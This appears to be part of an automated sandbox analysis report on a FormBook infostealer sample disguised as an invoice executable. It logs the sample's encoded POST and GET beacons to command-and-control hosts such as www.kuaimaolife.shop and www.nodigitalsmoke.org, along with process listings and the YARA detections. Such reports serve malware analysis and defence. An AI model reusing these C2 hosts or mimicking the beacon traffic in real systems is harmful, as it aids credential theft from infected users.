                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Sep 27, 2024 09:08:39.718422890 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:39 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.54972138.55.251.233803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:45.241005898 CEST666OUTPOST /j39u/ HTTP/1.1
                            Host: www.kuaimaolife.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kuaimaolife.shop
                            Referer: http://www.kuaimaolife.shop/j39u/
                            Connection: close
                            Content-Length: 203
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 55 33 70 51 42 55 65 63 42 35 5a 66 4b 4e 6e 73 2b 51 30 48 71 46 78 44 6c 55 46 71 75 2f 67 66 51 67 42 74 4a 51 6b 72 4e 41 68 62 59 66 48 2f 39 51 30 73 36 44 4c 54 66 6b 50 69 66 69 71 68 7a 42 53 52 46 6d 74 42 67 48 64 31 50 32 50 58 4e 75 47 31 41 4a 6d 66 62 4c 50 52 38 36 78 74 2f 44 6e 51 68 37 51 2b 4a 6a 4a 48 44 33 6f 57 69 6d 50 2b 6b 4d 69 30 45 62 38 4a 6d 51 4b 2f 79 53 57 6f 31 55 50 44 52 38 65 43 32 79 34 63 55 4e 39 6d 6a 6f 73 50 5a 69 76 37 54 64 67 72 65 5a 78 64 54 34 2b 4c 53 34 4e 2b 39 73 77 44 46 54 45 46 55 52 52 70 2f 65 6f 3d
                            Data Ascii: jz=Mxd/3qPWYHfxU3pQBUecB5ZfKNns+Q0HqFxDlUFqu/gfQgBtJQkrNAhbYfH/9Q0s6DLTfkPifiqhzBSRFmtBgHd1P2PXNuG1AJmfbLPR86xt/DnQh7Q+JjJHD3oWimP+kMi0Eb8JmQK/ySWo1UPDR8eC2y4cUN9mjosPZiv7TdgreZxdT4+LS4N+9swDFTEFURRp/eo=
                            Sep 27, 2024 09:08:46.112279892 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:45 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.54972238.55.251.233803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:47.788252115 CEST686OUTPOST /j39u/ HTTP/1.1
                            Host: www.kuaimaolife.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kuaimaolife.shop
                            Referer: http://www.kuaimaolife.shop/j39u/
                            Connection: close
                            Content-Length: 223
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4b 49 66 51 43 5a 74 4b 52 6b 72 4d 41 68 62 54 2f 48 36 33 77 30 6a 36 44 47 6d 66 6c 6a 69 66 69 75 68 7a 45 75 52 46 52 52 4f 68 58 64 7a 61 6d 50 56 51 65 47 31 41 4a 6d 66 62 4c 61 30 38 36 70 74 2f 77 50 51 6e 61 51 39 58 7a 4a 45 55 48 6f 57 6d 6d 50 36 6b 4d 6a 58 45 59 34 7a 6d 54 79 2f 79 51 4f 6f 32 47 6e 4d 66 38 65 41 72 69 35 4d 55 4e 49 44 6d 5a 6b 45 59 6a 4b 6a 4d 72 56 50 66 76 63 33 4a 61 32 6a 42 59 68 47 74 2f 34 30 55 6a 6c 73 4f 79 42 5a 68 4a 39 4d 42 39 63 59 56 6a 59 44 75 49 32 6d 6a 75 62 66 4a 55 58 79
                            Data Ascii: jz=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvKIfQCZtKRkrMAhbT/H63w0j6DGmfljifiuhzEuRFRROhXdzamPVQeG1AJmfbLa086pt/wPQnaQ9XzJEUHoWmmP6kMjXEY4zmTy/yQOo2GnMf8eAri5MUNIDmZkEYjKjMrVPfvc3Ja2jBYhGt/40UjlsOyBZhJ9MB9cYVjYDuI2mjubfJUXy
                            Sep 27, 2024 09:08:48.682331085 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:48 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.54972338.55.251.233803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:50.363095999 CEST1703OUTPOST /j39u/ HTTP/1.1
                            Host: www.kuaimaolife.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kuaimaolife.shop
                            Referer: http://www.kuaimaolife.shop/j39u/
                            Connection: close
                            Content-Length: 1239
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4d 51 66 51 33 4e 74 4b 79 4d 72 50 41 68 62 61 66 48 37 33 77 30 45 36 44 4f 71 66 6c 2b 5a 66 67 6d 68 78 69 61 52 4e 46 46 4f 30 48 64 7a 59 6d 50 55 4e 75 48 68 41 4e 4b 44 62 4c 4b 30 38 36 70 74 2f 32 7a 51 67 4c 51 39 56 7a 4a 48 44 33 6f 67 69 6d 50 65 6b 4e 47 73 45 62 55 6a 6d 6a 53 2f 79 77 65 6f 6d 6c 50 4d 58 38 65 47 71 69 34 4a 55 4e 55 51 6d 5a 6f 6d 59 6a 75 4a 4d 73 68 50 66 6f 31 68 4e 71 32 56 59 6f 68 6e 2f 76 70 53 4b 6c 78 64 41 69 35 44 74 4c 35 59 4a 50 63 47 56 45 63 6a 71 70 62 4b 2f 6f 72 6b 48 52 72 36 35 6a 74 57 69 46 30 6d 5a 4e 4c 54 73 62 49 48 42 7a 62 62 32 45 5a 50 31 4d 64 77 63 6a 35 52 67 78 58 6d 75 70 32 72 34 49 63 53 6a 62 35 33 46 32 68 42 46 67 31 31 77 4c 67 49 50 6c 4f 72 6b 6f 30 77 4a 6b 79 32 76 78 48 75 70 4c 6d 30 43 73 61 41 69 55 43 4a 66 75 44 61 37 35 6e 6f 77 77 35 54 47 49 53 4f 6c 59 6b 45 6b 34 67 59 75 57 42 [TRUNCATED]
                            Data Ascii: jz=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvMQfQ3NtKyMrPAhbafH73w0E6DOqfl+ZfgmhxiaRNFFO0HdzYmPUNuHhANKDbLK086pt/2zQgLQ9VzJHD3ogimPekNGsEbUjmjS/yweomlPMX8eGqi4JUNUQmZomYjuJMshPfo1hNq2VYohn/vpSKlxdAi5DtL5YJPcGVEcjqpbK/orkHRr65jtWiF0mZNLTsbIHBzbb2EZP1Mdwcj5RgxXmup2r4IcSjb53F2hBFg11wLgIPlOrko0wJky2vxHupLm0CsaAiUCJfuDa75noww5TGISOlYkEk4gYuWBQ3dx8w9fIxOQ3kAniNU+N5YmYiIJfnwbCez+aHEwU1EZvlIACh2yYwI9PDBcWbg4Dq6pp0f9UIz9jzfURSwY42zmRy2eLs1RcH39iecZeFGisupEEd2ZUe9LCG32HvzEATASDprC087N43q2AZNmtoShaFaramdPWPk6HYoGhX0fHw2VWSZOvcFSCMA2Ln+q0jLh7zkba191p1KarxcZscPy4aQ6Xg991jyFl1UDjl2GCQk/X+nRLeW84hTGwcKi36XXEziYnck/tQIkWWwAZSuiSjHVPBstv++aMHZX2R7H8qtONLhgSXsLsZ6FtlfbzsXVoPye3LKtUx7u70SHOFz76WC6ctrRTqbE2KJtBeQ8iEjQgkfnduAk5jsjC09Lwbsd1tJmiGvJ0w0EGkcxD8J2/lkkTUVoyTsAyC4r0rPsz+JwahPqTq/2xj1nCG0BU9rEnEPrpCta3ZENZImPZ64X6vBENMPfGzvvbO4qpiw4jmv/p7liDuogZ0IizuRuwkNJoL5pm7z8GqiJ8PJDMy58K5DTw7CsVsxASjBy1TImUYfedcnb+3GaVx+AWra6XbzpciAOyCgJojz1keqglTslLwGtUEuuLxtjdXfK2dqaqtwAIVqXfpmpUHAB2YDb9KQOgS26xz9SXCV8nn9i4XU9DbU144xSZj [TRUNCATED]
                            Sep 27, 2024 09:08:51.235686064 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:51 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.54972438.55.251.233803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:52.939517021 CEST406OUTGET /j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX HTTP/1.1
                            Host: www.kuaimaolife.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Sep 27, 2024 09:08:53.830423117 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:53 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.5497253.33.130.190803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:58.990962982 CEST672OUTPOST /pnbu/ HTTP/1.1
                            Host: www.nodigitalsmoke.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.nodigitalsmoke.org
                            Referer: http://www.nodigitalsmoke.org/pnbu/
                            Connection: close
                            Content-Length: 203
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 41 56 45 33 4e 38 4a 74 6a 51 48 68 68 68 77 73 6e 73 6e 74 63 4d 69 52 68 4b 4b 63 39 67 56 64 35 36 65 4d 4b 37 63 66 55 35 6d 69 72 35 63 6d 36 67 45 58 65 73 58 2f 31 6a 58 68 59 57 49 4e 4c 77 79 6c 77 75 4e 69 62 43 46 57 5a 68 56 4d 56 32 52 4c 64 44 49 56 30 5a 6f 38 4e 56 32 59 6c 2f 35 48 61 59 42 4a 67 43 4a 32 63 64 34 6f 51 42 4a 42 49 35 77 59 69 74 42 76 72 71 64 37 57 4d 50 4e 6d 6f 75 4c 57 48 67 4a 46 64 6e 47 4a 4d 68 75 2f 59 68 77 47 47 67 75 4e 54 62 78 53 79 5a 4f 2f 76 5a 64 32 35 61 45 38 63 4a 54 46 2f 6a 48 74 46 4e 71 59 56 34 3d
                            Data Ascii: jz=COAMvoC7/KgkAVE3N8JtjQHhhhwsnsntcMiRhKKc9gVd56eMK7cfU5mir5cm6gEXesX/1jXhYWINLwylwuNibCFWZhVMV2RLdDIV0Zo8NV2Yl/5HaYBJgCJ2cd4oQBJBI5wYitBvrqd7WMPNmouLWHgJFdnGJMhu/YhwGGguNTbxSyZO/vZd25aE8cJTF/jHtFNqYV4=


                            Session IDSource IPSource PortDestination IPDestination Port
                            14192.168.2.5497263.33.130.19080
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:09:01.904606104 CEST692OUTPOST /pnbu/ HTTP/1.1
                            Host: www.nodigitalsmoke.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.nodigitalsmoke.org
                            Referer: http://www.nodigitalsmoke.org/pnbu/
                            Connection: close
                            Content-Length: 223
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 61 30 30 33 65 64 4a 74 68 77 48 69 75 42 77 73 6f 4d 6e 70 63 4d 2b 52 68 50 72 42 38 54 78 64 35 59 47 4d 4e 36 63 66 52 35 6d 69 73 4a 63 70 6b 51 45 41 65 74 72 4a 31 68 7a 68 59 57 4d 4e 4c 78 43 6c 7a 59 46 68 62 53 46 59 4d 78 56 30 4c 47 52 4c 64 44 49 56 30 59 4d 57 4e 56 2b 59 6b 4f 4a 48 4c 4b 35 49 2f 79 4a 35 64 64 34 6f 48 52 49 4b 49 35 77 2b 69 73 64 4a 72 76 5a 37 57 4a 4c 4e 6e 35 75 4d 66 48 67 50 49 39 6d 74 49 70 59 42 31 5a 78 6e 4f 6e 38 6f 57 6c 62 65 54 45 30 6b 6c 4e 52 31 6c 5a 32 38 73 50 42 6b 55 50 43 75 33 6d 64 61 47 43 74 75 42 6f 34 69 77 57 61 38 39 48 35 51 58 51 46 68 39 4e 5a 39
                            Data Ascii: jz=COAMvoC7/Kgka003edJthwHiuBwsoMnpcM+RhPrB8Txd5YGMN6cfR5misJcpkQEAetrJ1hzhYWMNLxClzYFhbSFYMxV0LGRLdDIV0YMWNV+YkOJHLK5I/yJ5dd4oHRIKI5w+isdJrvZ7WJLNn5uMfHgPI9mtIpYB1ZxnOn8oWlbeTE0klNR1lZ28sPBkUPCu3mdaGCtuBo4iwWa89H5QXQFh9NZ9


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:06:53
                            Start date:27/09/2024
                            Path:C:\Users\user\Desktop\Revised Invoice H000127896.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Revised Invoice H000127896.exe"
                            Imagebase:0x400000
                            File size:1'379'361 bytes
                            MD5 hash:2A489CAB1A6113A0F082D8BFEE40EAD9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:03:06:57
                            Start date:27/09/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Revised Invoice H000127896.exe"
                            Imagebase:0x220000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:03:07:35
                            Start date:27/09/2024
                            Path:C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe"
                            Imagebase:0x800000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:03:07:36
                            Start date:27/09/2024
                            Path:C:\Windows\SysWOW64\replace.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\replace.exe"
                            Imagebase:0xf0000
                            File size:18'944 bytes
                            MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
